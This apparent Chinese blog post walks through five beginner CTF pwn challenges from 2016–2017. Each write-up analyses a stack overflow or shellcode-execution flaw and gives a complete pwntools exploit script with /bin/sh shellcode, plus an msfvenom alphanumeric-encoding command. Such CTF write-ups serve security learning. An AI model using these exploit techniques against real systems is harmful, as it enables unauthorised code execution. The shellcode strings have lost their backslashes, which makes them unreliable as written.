pwn入门系列习题解析

Posted 2021-01-14 xingzherufeng

 

第一题--BITSCTF 2017-Command_Line

 

查看文件格式以及开启的保护措施，此处全保护均未开启（默认开启ASLR），且为64位ELF。

 

 

尝试运行，发现打印出一处地址（基本不用考虑ASLR了），猜测为栈某处地址

 

放入ida观察逻辑，发现的确打印了栈上的一个地址，可以直接用。此处可以顺便探测一下偏移，0x10+8=0x18，输入0x18个字符后即可覆盖ret。只要注意shellcode位于泄露的栈地址后的0x20处（0x18+8=0x20）。至于shellcode直接从网上找就可以了，一个不行多试试别的（我第一个不行，换了一个就好了）。

 

完整exp如下：

 1 #!/usr/bin/python
 2 #coding:utf-8
 3 
 4 from pwn import *
 5 io = process(‘./pwn1‘)
 6 
 7 shellcode = ‘x31xf6x48xbbx2fx62x69x6ex2fx2fx73x68x56x53x54x5fx6ax3bx58x31xd2x0fx05‘
 8 
 9 shellcode_address_at_stack = int(io.recv()[:-1], 16)+0x20
10 log.info("Leak stack address = %x", shellcode_address_at_stack)
11 
12 payload = "x90"*24
13 payload += p64(shellcode_address_at_stack)
14 payload += shellcode
15 io.sendline(payload)
16 io.interactive()

 

 

 

第二题—BSides San Francisco CTF 2017-b_64_b_tuff

 

查看文件格式和保护，发现32位ELF文件，开了NX保护，即数据段不可执行。

 

 

尝试运行，发现打印出了栈顶的地址，其次会要求我们输入，我们看到他会计算我们输入的字符个数，接着会发现一个貌似是base64的加密（特征“==”结尾）。且发生栈溢出。

 

我们放入ida观察程序逻辑。重点关注后4个语句。首先将输入的字符串进行base64加密，然后打印出加密的base64码，接着会运行他。那么现在目的明确，我们需要输入一串字符串，满足base64加密后为可执行的shellcode即可。

 

这里推荐msfvenom工具

 

首先，我们需要一个编码器，只需要大小写都满足的混合代码就可以，用msfvenom -l encoders来查看编码器。

 

编码器还是很多的，我们就选择x86/alpha_mixed就行。

由于msfvenom的输入只能从stdin读取，因此我们用管道符通过python输入给他

python -c ‘import sys; sys.stdout.write("x31xf6x48xbbx2fx62x69x6ex2fx2fx73x68x56x53x54x5fx6ax3bx58x31xd2x0fx05")‘ | msfvenom -p - -e x86/alpha_mixed -a linux -f raw -a x86 --platform linux -o payload

完整exp如下：

 1 #!/usr/bin/python
 2 #coding:utf-8
 3 
 4 from pwn import *
 5 from base64 import *
 6 
 7 io = process(‘./b-64-b-tuff‘)
 8 
 9 shellcode = b64decode("PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIp1kyigHaX06krqPh6ODoaccXU8ToE2bIbNLIXcHMOpAA")
10 
11 print io.recv()
12 io.send(shellcode)    
13 print io.recv()        
14 io.interactive()

 

 

 

第三题--CSAW Quals CTF 2017-pilot

 

查看文件格式和开启保护情况，全保护未开启，64位ELF，考虑执行shellcode

 

观察程序执行情况，比较有用的信息是打印出的一个地址，别的好像都是废话。

 

 

我们把它放入ida观察一下逻辑

 

这么多std库的调用，应该是c++的代码，我们忽略掉多余信息，关注read函数，发现他向buf数组中输入了0x40个字符，而buf位于rbp-0x20处，这里明显存在栈溢出。

 

那么我们现在的思路就是溢出ret制造栈溢出。

但是我这里直接正常溢出覆盖返回值执行shellcode会出错，我在main函数返回时的ret下断点，跟进调试

 

我们发现，当执行完push rbx后，函数返回值会被覆盖掉，我们接着执行

上图是push rdi执行后，原本的shellcode最后一行也被替换掉了，由于我们暂时找不到比较短的shellcode，  因此我们需要对shellcode进行截断改造。

我们通过之前的调试可以发现，执行完push rdi后会破坏ret之前共24个字节（3*8）的栈空间数据。再则，我们read可控的输入为0x40，buf到rbp的距离为0x20，因此ret后的栈空间还有0x60-0x20-8-8=0x10，即16字节数据可控。而通过打开ida显示字节码的功能后，可以看出push rdi后shellcode还剩下8字节未执行，ret后的栈空间足够我们控制。

 

我们使用上述jmp跳转指令，可以看到它的字节码为EB 05（注意jmp跳转的距离是从该语句的下一条语句地址算，因此为0x34-0x2f=0x05）。这里注意到我们前面可以输入的shellcode未被覆盖部分为前24个字节，又考虑到需要留给jmp跳转语句两个字节（EB 18）

我们只要先传22字节的shellcode，再传2字节的EB 18进行跳转，再接上剩下8字节的shellcode，即可得到shell。

完整exp如下：

 1 #!/usr/bin/python
 2 #coding:utf-8
 3 
 4 from pwn import *
 5 
 6 io = process(‘./pilot‘)
 7 
 8 shellcode1 = "x48x31xd2x48xbbx2fx2fx62x69x6ex2fx73x68x48xc1xebx08x53x48x89xe7x50"
 9 shellcode1 += "xebx18"
10 shellcode2 = "x57x48x89xe6xb0x3bx0fx05"
11 print io.recvuntil("Location:")
12 shellcode_address_at_stack = int(io.recv()[0:14], 16)
13 log.info("Leak stack address = %x", shellcode_address_at_stack)
14 
15 payload = ""                        
16 payload += shellcode1
17 payload += "x90"*(0x28-len(shellcode1))
18 payload += p64(shellcode_address_at_stack)
19 payload += shellcode2
20 
21 io.send(payload)
22 io.interactive()

 

 

 

第四题--Openctf 2016-apprentice_www

 

老规矩，查看文件格式和保护开启情况，可以看到开启了NX保护，为32位程序。

 

 

尝试运行程序，发现程序要求我们输入，输入后提示栈溢出且把我们的输入当作命令执行（怀疑），感觉可以利用

 

 

扔入ida分析一波，发现main函数很简单，刷新缓冲区和alarm简单的反调试，主要关注一下setup函数和butterflyswag函数。

 

 

我们发现在setup中调用了mprotect函数设置内存页属性，相当于设置了.bss，.data和.text可读可写可执行。接着进入下一个函数观察，发现有两个输入，第一个输入v1是一个单字节变量，第二个输入v2为一个地址，它会将v1的值写入我们输入的地址处，将地址的最低位给替换掉，由于只能修改一个字节，导致我们不能get shell，我们需要想办法通过一个字节的修改来扩大可控范围。

我们的想法是通过覆盖0x080485db处的jnz语句，使得其跳转回头继续执行两次scanf。

 

这里需要注意一下，由于我们只能修改最后一个字节，因此此处通过计算得到（0x9d-0xdb=0xffc2），此处计算出为负值可以直接使用。注意我们在这里修改后每次执行到这里都会返回前两个scanf，我们可以借这个条件完成所有shellcode的输入（分次输入）。这里我们可以选择for循环，限制条件为shellcode长度。记住for循环执行完后我们需要将跳转语句修改为shellcode所在地址，然后过滤掉所有多余字符串即可开启shell。

 

完整exp如下：

 1 #!/usr/bin/python
 2 #coding:utf-8
 3 
 4 from pwn import *
 5 
 6 io = process(‘./apprentice_www‘)
 7 
 8 patch_jne_address = 0x080485da        #jnz loc_80485E9所在地址
 9 shellcode_address = 0x080485db        #shellcode放置的地址
10 
11 shellcode = "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80"
12 
13 io.sendline(str(patch_jne_address))
14 io.sendline(str(0xc2))                #将jnz loc_80485E9改成jnz loc_804859D，重复执行两个call __isoc99_scanf读取shellcode
15 
16 for i in xrange(len(shellcode)):            #逐字节写入shellcode到jnz loc_80485E9指令后面
17     io.sendline(str(shellcode_address+i))
18     io.sendline(str(ord(shellcode[i])))
19 
20 io.sendline(str(patch_jne_address))
21 io.sendline(str(0x00))                #写完shellcode后改为jnz loc_80485DB，执行shellcode
22 
23 io.recv()
24 io.interactive()

 

 

 

第五题--Openctf 2016-tyro_shellcode1

 

老方法走一遭，发现这次保护开的比较多啊，从保护上看貌似不能执行shellcode而且开了canary保护，栈溢出也被限制了。

 

 

放入ida瞧一瞧，从逻辑上瞧一瞧。发现mmap一个内存块，然后read输入也在这块内存块上，下面竟然把我们的输入直接执行了，这下简单了，只需要输入shellcode就拿到shell

 

这里有个注意点，read调用的输入函数，我们在交互的时候可以直接使用send，而不需要sendline，这样可以省下一个字节的空间，对于有些对栈空间要求严格题目可能有奇效。

 

完整exp如下：

 1 #!/usr/bin/python
 2 #coding:utf-8
 3 
 4 from pwn import *
 5 
 6 io = process(‘./tyro_shellcode1‘)
 7 
 8 shellcode = "x31xc9xf7xe1xb0x0bx51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"
 9 
10 io.sendline(shellcode)
11 io.interactive()